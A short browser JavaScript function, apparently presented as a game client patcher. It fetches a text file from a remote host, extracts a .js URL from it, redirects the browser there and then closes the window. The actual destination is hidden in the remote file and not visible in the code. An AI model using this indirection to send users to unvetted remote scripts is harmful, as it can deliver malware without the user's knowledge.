/* AI GENERATED BY CHATGPT */
async function fetchAndRedirect() {
  try {
    const response = await fetch('https://vorapis.pages.dev/product/v3/game_service/patcher/get_latest_client');
    if (!response.ok) throw new Error('Failed to fetch the text file.');


    const text = await response.text();
    console.log("Fetched text:", text);

    const jsUrlRegex = /\[?(https?:\/\/[^\s\]]+)\]?\.js\b/;
    const match = text.match(jsUrlRegex);

    if (match) {
      const jsUrl = match[1] + '.js';
      console.log("JavaScript file URL found:", jsUrl);

      window.location.href = jsUrl;
    } else {
      alert('No .js file URL found in the text.');
    }
  } catch (error) {
    console.error("Error:", error);
    alert("An error occurred while fetching or redirecting.");
  }
  setTimeout(function() {
  window.close();
  }, 1000);
}